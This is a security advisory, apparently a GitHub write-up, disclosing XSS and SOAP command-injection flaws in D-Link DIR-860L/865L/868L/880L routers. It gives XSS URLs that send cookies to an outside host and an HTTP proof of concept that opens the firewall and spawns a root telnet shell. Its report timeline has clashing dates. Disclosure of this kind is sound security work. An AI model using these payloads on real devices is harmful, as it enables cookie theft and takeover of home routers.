Headline
CVE-2018-6530: GitHub - soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto: 日前我发现了D-Link DIR 880L/865L/868L/860L路由器存在多个XSS和命令注入漏洞,最主要的问题是路由器未对用户输入进行检查,导致恶意数据请求被执行,最终被远程攻击者控制整个设备。
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
0x00 Product Description
Dlink is a multinational networking equipment manufacturing corporation.
The Dlink 860L/865L/868L/880L are wireless “Cloud” Router.
The vulnerabilities details are as follows:
Vendor: D-Link
Devices: DIR-880 REVA / DIR-868 REVA / DIR-865 / DIR-860 REVA
Firmware:
DIR-880L_REVA_FIRMWARE_PATCH_1.08B04
DIR868LA1_FW112b04
DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01
DIR860LA1_FW110b04
0x01 Vulnerabilities Summary
The Dlink 860L/865L/868L/880L is a router overall badly designed with a lot of vulnerabilities.
My research in analyzing the security of Dlink routers starts from a recent security contest organized by a security company.
0x02 The summary of the vulnerabilities is:
- WAN && LAN - revA/B - XSS - CVE-2018-6527, CVE-2018-6528, CVE-2018-6529
- LAN - revA/B - OS command injection - CVE-2018-6530
0x03 Details - WAN && LAN - revA/B - XSS
After analyzing PHP files inside /htdocs/webinc, I found several trivial XSS vulnerabilities.
An attacker can use the XSS to target an authenticated user in order to steal the authentication cookies.
- xss inside /htdocs/webinc/body/bsc_sms_send.php
[…] <span class="value"> <input id="receiver" type="text" size="50" maxlength="15" value="<? echo $_GET[“receiver”]; ?>"/> </span> […]
An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc_sms_send.php?receiver="><script>window.open('http://9.9.9.9:9999/cookie.asp?msg=’+document.cookie)</script><"
- xss inside /htdocs/ webinc/js/adv_parent_ctrl_map.php
[…] var msgArray = [ '<?echo i18n(“You have successfully configured your router to use OpenDNS Parental Control.”);?>’, ‘<?echo i18n(“Do you want to test the function?”);?>’, ‘<p><input type="button" value="<?echo i18n(‘Test’);?>" onclick="window.open(\’http://www.opendns.com/device/welcome/?device_id=<? echo $_GET[“deviceid”];?>\’)" /><input type="button" value="<?echo i18n(‘Return’);?>" onClick="self.location.href=\’adv_parent_ctrl.php\’;" /></p>’ ]; BODY.ShowMessage('<?echo i18n(“OpenDNS PARENTAL CONTROLS”);?>’, msgArray); […]
An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/adv_parent_ctrl_map.php?deviceid=whatever\’);window.open(\’http://9.9.9.9:9999/cookie.asp?msg=\’+document.cookie
- xss inside /htdocs/ webinc/js/bsc_sms_inbox.php
[…]
InitValue: function(xml)
{
var get_Treturn = '<?if($_GET[“Treturn”]=="") echo "0"; else echo $_GET[“Treturn”];?>’;
…
}
[…]
An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc_sms_inbox.php?Treturn=0’;window.open('http://9.9.9.9:9999/cookie.asp?msg=’+document.cookie);get_Treturn=’1
0x04 Details - LAN - revA/B - Command injection in SOAP controlType url interface
The vulnerability occurs in /htdocs/cgibin which is executed by the web server for, just handles almost http requests from WAN and LAN, and my research in analyzing SOAP interface started from a security analysis report regarding UPNP protocol, then I reviewed the SOAP interface, which is handled by the soapcgi_main function in cgibin, seems to have been mostly overlooked.
It should be noted that you could insert and execute malicious commands without privilege, meanwhile the injection point is the service field which is passed to soap.cgi to indicate control type, this exploitation also works even if invalid SOAPAction and whatever XML stream in a request.
Here’s the code in C to show some details about this issue:
/* Grab a pointer to the request url */ requri = getenv(“REQUEST_URI”); /* goto failure if the urquri does not start with “?service=” */ if((query = strchr(requri, “?”)) == NULL or strncmp(query, "?service=", strlen(“?service=”))) { goto failure_condition; } /* Point the control type field pointer 9 bytes beyond the requri */ controlType = query + strlen(“?service=”);
… …
/* Create/open a shell script using the specified control type string */ sprintf(filename, "%s/%s_%d.sh", "/var/run", controlType, getpid()); fn = fopen(filename “a+”); /* Write self-deleting command into the srcipt and execute it by "sh -c"*/ if(fn) { fprintf(fn, "rm -f %s/%s_%d.sh", "/var/run", controlType, getpid()); fclose(fn); sprintf(filename, "%s/%s_%d.sh", "/var/run", controlType, getpid()); system(filename); }
Proof of concept:
POST /soap.cgi?service=whatever-control;iptables -P INPUT ACCEPT;iptables -P FORWARD ACCEPT;iptables -P OUTPUT ACCEPT;iptables -t nat -P PREROUTING ACCEPT;iptables -t nat -P OUTPUT ACCEPT;iptables -t nat -P POSTROUTING ACCEPT;telnetd -p 9999;whatever-invalid-shell HTTP/1.1
Host: 192.168.100.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml
whatever-content
Here, we can easily build a soap http request and embed malicious command that spawns a telnet server on WAN that provides an unauthenticated root shell into it, and then login into router using telnet:
$ telnet 192.168.0.1 9999
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
0x05 Report Timeline
Dec 8, 2017: Vulnerabilities found.
Jul 18, 2018: Reported to [email protected].
Jul 18, 2018: The vendor followed up and made a schedule to fix it.
Feb 1, 2018: Reported those security issues to MITRE.
Feb 1, 2018: MITRE provides CVE-2018-6527, CVE-2018-6528, CVE-2018-6529, CVE-2018-6530.
Mar 1, 2018: The vendor release security announcement for customers.
Mar 2, 2018: I decide to make a public disclosure.
0x06 Credits
These vulnerabilities were found by Kaixiang Zhang.
0x07 References****DIR-880L RevA
Release Notes - ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdf
Firmware - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_v1.08B06_BETA.zip
DIR-865L RevA
Release Notes - ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf
Firmware - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_v1.10B01_BETA.zip
DIR-868L RevA
Release Notes - ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf
Firmware - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_v1.20B01_BETA.zip
DIR-860L RevA
Release Notes - ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf
Firmware - ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_v1.11B01_BETA.zip
Related news
By Deeba Ahmed The botnet is exploiting four different vulnerabilities in D-Link devices. This is a post from HackRead.com Read the original post: Mirai botnet resurfaces with MooBot variant to target D-Link devices
A variant of the Mirai botnet known as MooBot is co-opting vulnerable D-Link devices into an army of denial-of-service bots by taking advantage of multiple exploits. "If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks," Palo Alto Networks Unit 42 said in a